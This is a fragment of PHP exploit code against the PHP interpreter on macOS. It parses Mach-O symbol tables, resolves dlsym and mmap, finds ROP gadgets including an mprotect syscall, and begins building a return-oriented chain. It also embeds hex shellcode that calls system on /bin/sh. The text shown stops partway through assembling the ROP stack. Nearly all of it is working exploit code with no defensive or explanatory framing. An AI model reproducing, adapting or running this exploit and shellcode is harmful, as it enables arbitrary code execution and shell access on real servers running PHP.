function getsymtabsym($mh, $name) { if (r32($mh) == 0xfeedfacf) { $lc = $mh + 32; while ($lc < $mh + r32($mh + 20)) { if (r32($lc) == 0x2) { $symoff = r32(8 + $lc) + 0x1d000 + $mh; $nsyms = r32(12 + $lc); $stroff = r32(16 + $lc) + 4 + 0x1d000 + $mh; $strsize = r32(20 + $lc); $k = 0; for ($i = 0; $k < $nsyms; $i++) { $st = rstr($stroff + $k); if ($st == $name) { $nlist = $symoff + $i * 16; $val = r64($nlist + 8) & 0xffffffff + $mh; return $val; } $k += strlen($st) + 1; } } $lc += r32($lc + 4); } } return FALSE; }
require "pm.php"; require "pm_rop_osx.php"; function w64($x) { return ibuf($x, 8); } $all = alloc(4096); $shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800"); $addr = rop_findexec(); nogc($addr); $dlsym = getplt($addr, "_dlsym"); // get plt entry nogc($dlsym); $mmap_plt = getplt($addr, "_mmap"); // get plt entry $mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6); nogc($mmap); $mprotect = gadget(findmhfromaddr($mmap), "b84a000002"); // find b84a000002 movl $0x200004a, %eax -> mprotect syscall nogc($mprotect); function ig($a, $b) { return ibuf(gadget($a, $b), 8); } $arg1 = ig($addr, "5fc3"); $arg2 = ig($addr, "5ec3"); $arg3 = ig(findmhfromaddr($mmap), "5ac3"); $stack = $arg1; $stack .= w64($all['ptr'] & ~0xfff); $stack .= $arg2; $stack .= w64(4096 * 2);